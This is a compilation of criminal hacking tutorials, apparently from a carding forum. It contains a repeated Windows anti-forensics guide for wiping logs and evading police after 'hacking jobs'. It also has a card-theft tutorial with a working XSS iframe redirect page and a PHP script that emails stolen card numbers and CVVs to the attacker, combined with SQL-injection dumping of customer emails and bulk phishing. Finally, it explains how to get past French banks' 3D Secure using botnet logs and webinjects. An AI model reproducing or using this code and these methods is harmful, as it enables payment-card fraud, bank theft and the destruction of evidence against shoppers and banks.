ANY real information to your hacking alias. Build fake information if you are paranoid.

4.) Assume the FBI has the I.P logs of every website in the world.

5.) Use SSH tunneling to an offshore shell on top of your VPN for extra security.

6.) Don't get lazy, and be patient.
Tips:
NEVER have personal information linking to your social media. (Facebook, Twitter etc)
------------------------------------------------------------------------------------------------------------
---------------------
Always use SSL browsing to view websites, there are addons for firefox and chrome that
you can use.
------------------------------------------------------------------------------------------------------------
---------------------
NEVER discuss what you have done or are planning over email, always use encrypted
chat services.
------------------------------------------------------------------------------------------------------------
---------------------
Ideally, there should be nothing incriminating in your home, or at least too incriminating.
------------------------------------------------------------------------------------------------------------
---------------------
Don't use credit cards in areas you have stolen Wi-Fi from, security cameras are a bitch.
------------------------------------------------------------------------------------------------------------
---------------------
When Socially engineering items, get them sent to a nearby empty house. No point
getting caught for that hello kitty teapot you've been dying for.
------------------------------------------------------------------------------------------------------------
---------------------
#1 TIP: If the cops show (with a warrant), You don't say a WORD. A NOT A SINGLE
SOUND SHOULD EXIT YOUR MOUTH. You don't say 'I want my lawer', you don't
say 'Don't touch that', you say NOTHING. If you even your mouth for a SECOND, and
say ANYTHING, even if its only 'Hi', consider yourself screwed. YOUR MOUTH
SHOULD NEVER OPEN.

Complete Anonymity Guide! [Windows] Be Invisible

Alpha's Anti-Forensics Guide
Anti-Forensics is the art of leaving no trace on your computer, it is combating
common forensic tools in preventing any penetration for forensic tests on your
computer. It can pretty much be summed up with one famous quote:
"Make it hard for them to find you, and impossible for them to prove they've found
you."
Because Linux installations are pretty much already secured, this guide will only
focus on Windows. Windows is a security nightmare, but what if I were to tell you
there was a way around this, a way to make Windows secure? VPNs, proxies, and
Tor only get you so far, but what do you do when they've traced it to your
computer? This guide is designed to help you prevent them from proving you've
done anything wrong even if they have your computer.
With that being said, let's get started.


=========================================================

Disabling Time Stamps
Using Time Stamps, forensic experts can build a 'digital time-line', this can be very
compelling evidence when cross-referenced with other known evidence. In order to
strengthen security, we must disable these logs.

Step 1.) User Assist File
--------------------------------------
There is a registry setting that keeps logs and dates of all launch programs, forensic
experts can use this to build a digital timeline, we must disable this for computer security.
Navigate to 'HKEY_Current_User\Software\Microsoft\Windows\Currentvers
ion\Explorer\Userassist' . You should see two subkeys called Count, delete both these
keys. Now right-click the UserAssist key and create a new key named 'Settings'. In this
key create DWORD value named NoLog, set the value to 1.
Windows will no longer store hidden logs of the exact times you have been accesing
files, therefore forensics experts can no longer use these hidden logs to create a digital
timeline.

Step 2.) Last Access Logs
------------------------------------------
Next we will disable the last access in Windows. What last access is is a setting on
Windows that allows you to see when you opened, modified, and/or created files on your
computer and is similar to the UserAssist registry key. By disabling this forensic experts
won't as easily be able to tell when you've been accessing programs or files on your
computer.
To disable last access open command prompt on your computer, if on Vista or Windows
7 make sure to run as administrator. In command prompt type the following:
fsutil behavior set disablelastaccess 1
Last access has now been disabled, in order for it to take effect you must restart your
computer.



=========================================================

Encrypting Your Computer
It is very important to make sure that your computer is encrypted, in the case an
unwanted visitor is trying to access your computer, they will not be able to access to
computer if it is encrypted.

Step 1.) TrueCrypt
--------------------------------
To encrypt your computer, you can use TrueCrypt, a free program that allow you to
encrypt your computer. When encrypting with TrueCrypt, you have two options; the first
one is to create a hidden container. A hidden container is an operating system that is
impossible prove exists.
When creating a hidden container you will have three different passwords:
1. The First would be for your decoy system, the operating system you would show
someone forcing you to login your computer.
2. The second password would be for your outer volume, the operating system you would
show someone forcing you to login to the second partition on your computer (a second
partition is require computer for your hidden container is.
3. Third password is for the hidden operating system on the second partition of your
computer, this operating system is placed in the inner volume, and is impossible to prove
exists (It appears to be RAW data).
The second option is to just encrypt your hard-drive. This is also very secure, but you
may be forced to give up your password due to court-order (In this situation, if you are a
VERY good lier, you could simply say 'I forgot', but you would have to make it
believable.) With normal drive encryption, your computer is just as secure encryption
wise, and you will have a single password.
Download here!

Step 2.) Encrypt Your Keystrokes
--------------------------------------------------------
You need to protect yourself from keyloggers. As strange as it may sound even the
government has keyloggers, a few years ago the law speculation about CIPAV, a
government spyware known to send the users IP address, Mac address, open ports,
operating system, installed applications, default web browser, visited URLs, logged in
user, etc...
In order to protect yourself from keyloggers, you should encrypt your keystrokes. You
can do this using a software called 'Keyscrambler'. Please note, you should NOT use the
free version of Keyscrambler, you should only use the Premium version, which costs a
decent some of money. (-Cough- ThePirateBay.se -Cough-).
Keyscrambler Premium supports 170 programs, including windows logon, most web
browsers, and popular IM programs (i.e. Skype).


=========================================================

Making Encryption Secure
Encryption is pointless if it can be easily bypassed or overcome. You need to make sure
that the encryption is secure too.

Step 1.) Make Sure Your Password Is Strong
Even with your computer encrypted, it is still vulnerable. Make sure your password is
good (for optimal security, your password should be twenty or more characters, with
symbols, numbers, and random capitals, and a special symbol (like ALT+1456) really
increase security).
If you password is not strong enough, you can change it by right clicking your encrypted
drive in TrueCrypt and selecting 'Change Password'.

Step 2.) Create A Locked Screen Saver
Encryption is pointless if the feds get to your computer while its running. They can use
live forensic tools that don't require the movement or shutdown of a computer. A very
simple technique to overcome this is to create a locked screen saver.
To create a locked screen saver in Windows Vista or Windows 7;
Right click your desktop and click on 'Personalize'. In the bottom left hand corner you
should see 'Screen Saver', click that. Now, check 'On Resume, Display Logon Screen',
and set 'Wait' to 5. Now, underneath that you may set what you want your screen saver to
be.
Now you must go to your Control Panel. Click on System and Securtiy, now click on
'Power Options' find your selected plan and click 'Change plan settings.' Now, set 'Turn
Of Display' to 5 minutes. Voila! You have now created a locked screen saver.

Step 3.) Get A Good Anti-Virus
This may seem obvious, but all this is pointless if you get infected with a keylogger that
takes screen shots. Having a good anti-virus is one of the most important things you can
do. Now, listen up. AVG, Avast, McCafe, Norton? They all SUCK. The only Anti-Virus
you should even consider are ESET Nod32 and Kaspersky, BitDefender is also pretty
good.
These anti-virus programs are expensive, but you can torrent them from ThePirateBay.se,
just make sure you find one with a lot of seeders.


=========================================================

Disabling Windows Hibernation
You may as well hand your computer over to the feds if they raid your house and your
computer is in hibernation. Also, putting your computer into hibernation is pretty much
just taking a screen shot of your RAM that gets saved to your hard drive.
To disable hibernation in Windows Vista/7:
Open your Control Panel. Click System and Security, then click 'Power Options'. Click
'Change plan settings' for you current power plan.
Now click 'Change advanced power settings'. Expand 'Sleep', then expand 'Hibernate
After'. Enter “0" for 'Setting:' to set hibernate to 'Never'.
Hibernation is now disabled.



=========================================================

Disable and Remove USB Logs
Next on the list of Anti-Forensics in to disable logs of USB activity, flash drives, etc...
This can be valuable if you have a flash drive with sensitive data and you don't want any
logs of it ever being plugged it to your computer.

Step 1.) Delete the USBSTOR Registry Setting
The USBSTOR setting contains history of plugged in USB devices.
To delete it, hit the WINDOWS Home Button + R at the same time. This will open up
'Run'; type: "Regedit" (without quotes). Browse to
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR
Now, right click 'USBSTOR' and hit 'Delete', then confirm that you want to delete the
key. Now, the key has been deleted.

Step 2.) Delete The Setupapi.log File
The Setuppapi.log is a plain-text file that stores the list of installed USB devices and their
drivers. We will delete it with a program called CCleaner.
CCleaner is actually one of the best anti-forensic tools out there, and its free. For
Instructions on using CCleaner, Please see the 'CCleaner' section of this guide.



=========================================================

Windows Security Misc.
This is for the shit that has to do with windows anti-forensic security, but wasn't big
enough to have its own section. That does NOT mean this section isn't important, the
stuff in here may actually be the most important in the whole guide.

Step 1) Disable System Restore Points
System Restore points can be used to bring your computer back to a date when it wasn't
secure and can also be used to restore overwritten files.
To disable System Restore points, right click 'Computer' and click 'Properties'. Now click
'Advanced System Settings'. Under 'System Protection' click 'Configure'.
Now, select 'Turn Of System Protection' and apply it.

Step 2) Disable 'Send Error Report to Microsoft
This is self-explanitory, we obviously don't want microsoft having logs of all our crashed
programs.
To do this, go to your start menu and search 'problem reporting settings' and then click on
'Choose How To Report Problems'. Click 'Change Report Settings For All Users' and
then set it to 'Never check for solutions'.

Step 3) Wipe With CCleaner
This is the heart of Anti-Forensics right here. CCleaner is actually one of the most
powerful Anti-Forensic tools, -IF- used correctly.
As it turns out, when deleting files, you DO NOT need to do multiple overwrites. With
modern hard-drives, one overwrite really is enough to delete a file beyond repair, even
though it is popular belief that you need several overwrites to be secure.
With CCleaner, I would recommend three overwrites, just in-case it misses something the
first time around (remember, it is a free software).
Once you have CCleaner installed, run it (AS ADMIN), go to 'Settings' and make sure
you have it set to overwrite deleted data with three passes.
Go back to 'Cleaner' and check EVERYTHING. I mean EVERYTHING, and hit 'Run
Cleaner'. You might want to leave this on overnight.
Do this everytime you are done with a major hacking job. When using normally (what
should be every time you are done with your computer), uncheck 'Wipe Free Space', this
will cut down the time from hours to a few minutes.

Step 4) Disable Debugging Upon Failure
This keeps logs of your computers failures and blue screen info.
To disable it, right click 'Computer' and go to 'Advanced System Settings', now go to
'Start Up and Recovery'. Now, set 'Debugging Information' to 'None'.

Step 5) Disable Windows Event Logging
Windows keeps logs of all events on the computer. First, before we disable, we must
clear all the logs.
To disable it, go to Control Panel then System and Security. Now, click Administrative
Tools, and then Event Viewer. In either pane of the Event Viewer window, right-click
System and then select Clear All Events, you will get a window that says: "Do you want
to save 'System' before clearing it?", click 'No'.
Now we must disable Windows Event Logging. Go to 'Run' and type in 'msconfig', then
go to 'Services' and make sure 'Hide all Microsoft Services' is UNCHECKED. Now scroll
down until you find 'Windows Event Logging', and UNCHECK it.
Now restart your computer right away.

Step 6) Disable Stand By In Registry
Disable 'Stand By'. Just create a new text document and add this:
Code:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\ACPI\Parameters]
"AMLIMaxCTObjs"=hex:04,00,00,00 "Attributes"=dword:0070
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic
es\ACPI\Parameters\WakeUp] "FixedEventMask"=hex:20,05
"FixedEventStatus"=hex:00,84 "GenericEventMask"=hex:18,50,00,10
"GenericEventStatus"=hex:10,00,ff,00
Then save as a .REG file, and run it. Click okay when prompted for confirmation.



=========================================================

Preventing being found in the first place:
You should never be tracked in the first place. Follow these guide lines to stay
anonymous:

1.) Use a no log VPN, such as nVPN, KryptoVPN, or BlackShades VPN. Offshore is
better than onshore.

2.) Use Tor for web browsing you wouldn't want the FBI, or your ISP looking at.

3.) Never release personal information online and use different aliases. Never connect
ANY real information to your hacking alias. Build fake information if you are paranoid.

4.) Assume the FBI has the I.P logs of every website in the world.

5.) Use SSH tunneling to an offshore shell on top of your VPN for extra security.

6.) Don't get lazy, and be patient.
Tips:
NEVER have personal information linking to your social media. (Facebook, Twitter etc)
------------------------------------------------------------------------------------------------------------
---------------------
Always use SSL browsing to view websites, there are addons for firefox and chrome that
you can use.
------------------------------------------------------------------------------------------------------------
---------------------
NEVER discuss what you have done or are planning over email, always use encrypted
chat services.
------------------------------------------------------------------------------------------------------------
---------------------
Ideally, there should be nothing incriminating in your home, or at least too incriminating.
------------------------------------------------------------------------------------------------------------
---------------------
Don't use credit cards in areas you have stolen Wi-Fi from, security cameras are a bitch.
------------------------------------------------------------------------------------------------------------
---------------------
When Socially engineering items, get them sent to a nearby empty house. No point
getting caught for that hello kitty teapot you've been dying for.
------------------------------------------------------------------------------------------------------------
---------------------
#1 TIP: If the cops show (with a warrant), You don't say a WORD. A NOT A SINGLE
SOUND SHOULD EXIT YOUR MOUTH. You don't say 'I want my lawer', you don't
say 'Don't touch that', you say NOTHING. If you even your mouth for a SECOND, and
say ANYTHING, even if its only 'Hi', consider yourself screwed. YOUR MOUTH
SHOULD NEVER OPEN.

Complete Anonymity Guide! [Windows] Be Invisible

Alpha's Anti-Forensics Guide
Anti-Forensics is the art of leaving no trace on your computer, it is combating
common forensic tools in preventing any penetration for forensic tests on your
computer. It can pretty much be summed up with one famous quote:
"Make it hard for them to find you, and impossible for them to prove they've found
you."
Because Linux installations are pretty much already secured, this guide will only
focus on Windows. Windows is a security nightmare, but what if I were to tell you
there was a way around this, a way to make Windows secure? VPNs, proxies, and
Tor only get you so far, but what do you do when they've traced it to your
computer? This guide is designed to help you prevent them from proving you've
done anything wrong even if they have your computer.
With that being said, let's get started.


=========================================================

Disabling Time Stamps
Using Time Stamps, forensic experts can build a 'digital time-line', this can be very
compelling evidence when cross-referenced with other known evidence. In order to
strengthen security, we must disable these logs.

Step 1.) User Assist File
--------------------------------------
There is a registry setting that keeps logs and dates of all launch programs, forensic
experts can use this to build a digital timeline, we must disable this for computer security.
Navigate to 'HKEY_Current_User\Software\Microsoft\Windows\Currentvers
ion\Explorer\Userassist' . You should see two subkeys called Count, delete both these
keys. Now right-click the UserAssist key and create a new key named 'Settings'. In this
key create DWORD value named NoLog, set the value to 1.
Windows will no longer store hidden logs of the exact times you have been accesing
files, therefore forensics experts can no longer use these hidden logs to create a digital
timeline.

Step 2.) Last Access Logs
------------------------------------------
Next we will disable the last access in Windows. What last access is is a setting on
Windows that allows you to see when you opened, modified, and/or created files on your
computer and is similar to the UserAssist registry key. By disabling this forensic experts
won't as easily be able to tell when you've been accessing programs or files on your
computer.
To disable last access open command prompt on your computer, if on Vista or Windows
7 make sure to run as administrator. In command prompt type the following:
fsutil behavior set disablelastaccess 1
Last access has now been disabled, in order for it to take effect you must restart your
computer.



=========================================================

Encrypting Your Computer
It is very important to make sure that your computer is encrypted, in the case an
unwanted visitor is trying to access your computer, they will not be able to access to
computer if it is encrypted.

Step 1.) TrueCrypt
--------------------------------
To encrypt your computer, you can use TrueCrypt, a free program that allow you to
encrypt your computer. When encrypting with TrueCrypt, you have two options; the first
one is to create a hidden container. A hidden container is an operating system that is
impossible prove exists.
When creating a hidden container you will have three different passwords:
1. The First would be for your decoy system, the operating system you would show
someone forcing you to login your computer.
2. The second password would be for your outer volume, the operating system you would
show someone forcing you to login to the second partition on your computer (a second
partition is require computer for your hidden container is.
3. Third password is for the hidden operating system on the second partition of your
computer, this operating system is placed in the inner volume, and is impossible to prove
exists (It appears to be RAW data).
The second option is to just encrypt your hard-drive. This is also very secure, but you
may be forced to give up your password due to court-order (In this situation, if you are a
VERY good lier, you could simply say 'I forgot', but you would have to make it
believable.) With normal drive encryption, your computer is just as secure encryption
wise, and you will have a single password.
Download here!

Step 2.) Encrypt Your Keystrokes
--------------------------------------------------------
You need to protect yourself from keyloggers. As strange as it may sound even the
government has keyloggers, a few years ago the law speculation about CIPAV, a
government spyware known to send the users IP address, Mac address, open ports,
operating system, installed applications, default web browser, visited URLs, logged in
user, etc...
In order to protect yourself from keyloggers, you should encrypt your keystrokes. You
can do this using a software called 'Keyscrambler'. Please note, you should NOT use the
free version of Keyscrambler, you should only use the Premium version, which costs a
decent some of money. (-Cough- ThePirateBay.se -Cough-).
Keyscrambler Premium supports 170 programs, including windows logon, most web
browsers, and popular IM programs (i.e. Skype).


=========================================================

Making Encryption Secure
Encryption is pointless if it can be easily bypassed or overcome. You need to make sure
that the encryption is secure too.

Step 1.) Make Sure Your Password Is Strong
Even with your computer encrypted, it is still vulnerable. Make sure your password is
good (for optimal security, your password should be twenty or more characters, with
symbols, numbers, and random capitals, and a special symbol (like ALT+1456) really
increase security).
If you password is not strong enough, you can change it by right clicking your encrypted
drive in TrueCrypt and selecting 'Change Password'.

Step 2.) Create A Locked Screen Saver
Encryption is pointless if the feds get to your computer while its running. They can use
live forensic tools that don't require the movement or shutdown of a computer. A very
simple technique to overcome this is to create a locked screen saver.
To create a locked screen saver in Windows Vista or Windows 7;
Right click your desktop and click on 'Personalize'. In the bottom left hand corner you
should see 'Screen Saver', click that. Now, check 'On Resume, Display Logon Screen',
and set 'Wait' to 5. Now, underneath that you may set what you want your screen saver to
be.
Now you must go to your Control Panel. Click on System and Securtiy, now click on
'Power Options' find your selected plan and click 'Change plan settings.' Now, set 'Turn
Of Display' to 5 minutes. Voila! You have now created a locked screen saver.

Step 3.) Get A Good Anti-Virus
This may seem obvious, but all this is pointless if you get infected with a keylogger that
takes screen shots. Having a good anti-virus is one of the most important things you can
do. Now, listen up. AVG, Avast, McCafe, Norton? They all SUCK. The only Anti-Virus
you should even consider are ESET Nod32 and Kaspersky, BitDefender is also pretty
good.
These anti-virus programs are expensive, but you can torrent them from ThePirateBay.se,
just make sure you find one with a lot of seeders.


=========================================================

Disabling Windows Hibernation
You may as well hand your computer over to the feds if they raid your house and your
computer is in hibernation. Also, putting your computer into hibernation is pretty much
just taking a screen shot of your RAM that gets saved to your hard drive.
To disable hibernation in Windows Vista/7:
Open your Control Panel. Click System and Security, then click 'Power Options'. Click
'Change plan settings' for you current power plan.
Now click 'Change advanced power settings'. Expand 'Sleep', then expand 'Hibernate
After'. Enter “0" for 'Setting:' to set hibernate to 'Never'.
Hibernation is now disabled.



=========================================================

Disable and Remove USB Logs
Next on the list of Anti-Forensics in to disable logs of USB activity, flash drives, etc...
This can be valuable if you have a flash drive with sensitive data and you don't want any
logs of it ever being plugged it to your computer.

Step 1.) Delete the USBSTOR Registry Setting
The USBSTOR setting contains history of plugged in USB devices.
To delete it, hit the WINDOWS Home Button + R at the same time. This will open up
'Run'; type: "Regedit" (without quotes). Browse to
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR
Now, right click 'USBSTOR' and hit 'Delete', then confirm that you want to delete the
key. Now, the key has been deleted.

Step 2.) Delete The Setupapi.log File
The Setuppapi.log is a plain-text file that stores the list of installed USB devices and their
drivers. We will delete it with a program called CCleaner.
CCleaner is actually one of the best anti-forensic tools out there, and its free. For
Instructions on using CCleaner, Please see the 'CCleaner' section of this guide.



=========================================================

Windows Security Misc.
This is for the shit that has to do with windows anti-forensic security, but wasn't big
enough to have its own section. That does NOT mean this section isn't important, the
stuff in here may actually be the most important in the whole guide.

Step 1) Disable System Restore Points
System Restore points can be used to bring your computer back to a date when it wasn't
secure and can also be used to restore overwritten files.
To disable System Restore points, right click 'Computer' and click 'Properties'. Now click
'Advanced System Settings'. Under 'System Protection' click 'Configure'.
Now, select 'Turn Of System Protection' and apply it.

Step 2) Disable 'Send Error Report to Microsoft
This is self-explanitory, we obviously don't want microsoft having logs of all our crashed
programs.
To do this, go to your start menu and search 'problem reporting settings' and then click on
'Choose How To Report Problems'. Click 'Change Report Settings For All Users' and
then set it to 'Never check for solutions'.

Step 3) Wipe With CCleaner
This is the heart of Anti-Forensics right here. CCleaner is actually one of the most
powerful Anti-Forensic tools, -IF- used correctly.
As it turns out, when deleting files, you DO NOT need to do multiple overwrites. With
modern hard-drives, one overwrite really is enough to delete a file beyond repair, even
though it is popular belief that you need several overwrites to be secure.
With CCleaner, I would recommend three overwrites, just in-case it misses something the
first time around (remember, it is a free software).
Once you have CCleaner installed, run it (AS ADMIN), go to 'Settings' and make sure
you have it set to overwrite deleted data with three passes.
Go back to 'Cleaner' and check EVERYTHING. I mean EVERYTHING, and hit 'Run
Cleaner'. You might want to leave this on overnight.
Do this everytime you are done with a major hacking job. When using normally (what
should be every time you are done with your computer), uncheck 'Wipe Free Space', this
will cut down the time from hours to a few minutes.

Step 4) Disable Debugging Upon Failure
This keeps logs of your computers failures and blue screen info.
To disable it, right click 'Computer' and go to 'Advanced System Settings', now go to
'Start Up and Recovery'. Now, set 'Debugging Information' to 'None'.

Step 5) Disable Windows Event Logging
Windows keeps logs of all events on the computer. First, before we disable, we must
clear all the logs.
To disable it, go to Control Panel then System and Security. Now, click Administrative
Tools, and then Event Viewer. In either pane of the Event Viewer window, right-click
System and then select Clear All Events, you will get a window that says: "Do you want
to save 'System' before clearing it?", click 'No'.
Now we must disable Windows Event Logging. Go to 'Run' and type in 'msconfig', then
go to 'Services' and make sure 'Hide all Microsoft Services' is UNCHECKED. Now scroll
down until you find 'Windows Event Logging', and UNCHECK it.
Now restart your computer right away.

Step 6) Disable Stand By In Registry
Disable 'Stand By'. Just create a new text document and add this:
Code:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\ACPI\Parameters]
"AMLIMaxCTObjs"=hex:04,00,00,00 "Attributes"=dword:0070
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic
es\ACPI\Parameters\WakeUp] "FixedEventMask"=hex:20,05
"FixedEventStatus"=hex:00,84 "GenericEventMask"=hex:18,50,00,10
"GenericEventStatus"=hex:10,00,ff,00
Then save as a .REG file, and run it. Click okay when prompted for confirmation.



=========================================================

Preventing being found in the first place:
You should never be tracked in the first place. Follow these guide lines to stay
anonymous:

1.) Use a no log VPN, such as nVPN, KryptoVPN, or BlackShades VPN. Offshore is
better than onshore.

2.) Use Tor for web browsing you wouldn't want the FBI, or your ISP looking at.

3.) Never release personal information online and use different aliases. Never connect
ANY real information to your hacking alias. Build fake information if you are paranoid.

4.) Assume the FBI has the I.P logs of every website in the world.

5.) Use SSH tunneling to an offshore shell on top of your VPN for extra security.

6.) Don't get lazy, and be patient.
Tips:
NEVER have personal information linking to your social media. (Facebook, Twitter etc)
------------------------------------------------------------------------------------------------------------
---------------------
Always use SSL browsing to view websites, there are addons for firefox and chrome that
you can use.
------------------------------------------------------------------------------------------------------------
---------------------
NEVER discuss what you have done or are planning over email, always use encrypted
chat services.
------------------------------------------------------------------------------------------------------------
---------------------
Ideally, there should be nothing incriminating in your home, or at least too incriminating.
------------------------------------------------------------------------------------------------------------
---------------------
Don't use credit cards in areas you have stolen Wi-Fi from, security cameras are a bitch.
------------------------------------------------------------------------------------------------------------
---------------------
When Socially engineering items, get them sent to a nearby empty house. No point
getting caught for that hello kitty teapot you've been dying for.
------------------------------------------------------------------------------------------------------------
---------------------
#1 TIP: If the cops show (with a warrant), You don't say a WORD. A NOT A SINGLE
SOUND SHOULD EXIT YOUR MOUTH. You don't say 'I want my lawer', you don't
say 'Don't touch that', you say NOTHING. If you even your mouth for a SECOND, and
say ANYTHING, even if its only 'Hi', consider yourself screwed. YOUR MOUTH
SHOULD NEVER OPEN.

Hacking CVV Simple

This is my method for getting fresh CC info, sent directly to an inbox of your choosing!


First, you need to find yourself a vulnerable shop. Won't go into too many details here, this should be pretty drilled into your head by now. You can do this with Google Dorks manually, or use tools like WebCruiser, SQLi poison, etc. What your looking for is a shop with both SQLi vulnerabilities, and XSS vulnerabilities.


First, as you may have noticed on most databases containing CC info, it's encrypted, MD5, FPE, whatever it is it's not feasible to work with that. However, one thing you can work with is the current and former customer's e-mail addresses. Go ahead and rip the whole table with the customer information. If you're lucky, you'll get at least 10,000 e-mail addresses or more.


Next, you need to work with the XSS vulnerability. I've noticed the most common being POST vulnerability, so I'll go that route, but you can incorporate it with FORM or whatever.


You can use the following code to make a redirect.html or whatever you wish to name it. This page will load the vulnerable website immediately, with one exception, a giant IFRAME over it which of course is going to be another page you make.

<html>
<head>
<script language=javascript>
function submitPostLink()
:zin:{
document.postlink.submit();
}
</script>
</head>
<body onload="submitPostLink()">
<form action="http://www.XXXXXXXcom/TextSearch.asp" name=postlink method="post">
<input type="hidden" name="NAMEOFVULNERABLEFIELD" value="<iframe  src=&quot;Ecommerce Web Site Hosting and Streaming from YourHost.com  width=&quot;800&quot;height=&quot;2400&quot;  style=&quot;z-index: 0; position: absolute; top: 0; left: 0;  overflow-y: hidden;&quot; frameborder=0  align=center></iframe>">
</form>
</body>
</html>


Go ahead and goto the checkout page for the site you're working with, and save the page to your hard drive, including all the subdirectory files and images (firefox does this auto). Now, you need to edit the main file you just saved.


Search for "action=", and change the page following it to your third page you will make, which will be the PHP mail form that will send your e-mail all the information someone fills in the form. The code will look something like....

<?php
$userinfo = "@com"; //your email here
$ip = getenv("REMOTE_ADDR");
$message .= "".$_POST['firstname']."\n";
$message .= "".$_POST['lastname']."\n";
$message .= "".$_POST['org_name']."\n";
$message .= "".$_POST['telephone']."\n";
$message .= "".$_POST['fax']."\n";
$message .= "".$_POST['email']."\n";
$message .= "---------------------------------------------\n";
$message .= "".$_POST['cctype']."\n";
$message .= "".$_POST['credcard']."\n";
$message .= "".$_POST['exp_mon']."\n";
$message .= "".$_POST['exp_year']."\n";
$message .= "".$_POST['cccvv']."\n";
$message .= "".$_POST['ccname']."\n";


$subject="SUBJECT - $ip";
$headers = "From: NAMEl<@.com>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($userinfo,$subject,$message,$headers);


You'll want to follow this code with some html code that also looks like a copy of their site but with some text saying something along the lines of "sorry, this offer is no longer available" or something of the sort. I'll explain why right now.


After putting all this together and uploading it to a host, you'll want to shorten youre redirect.html URL, you can use *******, or another shortening service. Then, you can send an e-mail to all the customers e-mail addresses, (AND YOU CAN BE CREATIVE), but something along the lines of them being a valuable customer, and because of that, you're giving them one of your newest products for only 99 cents! Make sure that on your checkout form, you list the item you choose, so they see it when they're checking out.


A great service to send bulk mail for FREE, and no trial or anything, that is if you don't have hacked SMTP to use, is targethero.com


They let you send Unlimited e-mails to up to 5,000 different contacts. Not bad for free. You'll have to confirm your account with a cell phone, but you should just use receive-sms-online.com or freesmsreceive.com/index.php where you can get SMS sent to you with no registration.


Trust me, if you send enough e-mails to former customers, especially when it's in the health and supplement niche, if they get an offer for a 99 cent bottle or something, they're gonna jump all over that!


Anyway, if you have any questions, please feel free to ask, and I apologize if I was a little vague but I don't have much time right now but wanted to get this up. Enjoy!!!

!!SECERET OF FRENCH BANK

Hi I write for each bank all info you need for do online bank transfer and all info about 3d secure (vbv)
If you have a zeus or spyeye botnet with lots of french logs and you can't do anything read

Introduction : French bank are very secure, maybe more than a lot of usa bank
You need to have a phone (french or not) for do online transfert or vbv (skype number works good)
Find bin of cvv (6 first number) and look the bank
Bank : Societe Generale (very use in france)
Security : High

3d secure

for pay with a cc in vbv website. The bank send 2 possibility of ask :

1st is the most easy, if the owner of the card have not enter phone number and for certain website with an old vbv sytem. They ask only the DOB

2nd most use, need a code received in the phone of the user (can't be card)
or you need add a phone number (owner not have activate 3d secure)
You need call the phone number for foreign land if you are not in france and answer for these question : DOB & DEPT OF BIRTH & 8-digit customer code on a rib & Your phone you want to use

Online transfer (in France for other country you need just add rib and print the paper for send in societe general agency)

If the owner not have register his phone you can do online transfer, you just need
A phone number of foreign country or france
8-digit customer code on a rib & DOB & DEPT OF BIRTH
wait 3-5days
(this is same security than 3d secure)

for conclusion, you need a webinject or a phishing page with :
8-digit customer code on a rib
DEPT OF BIRTH
DOB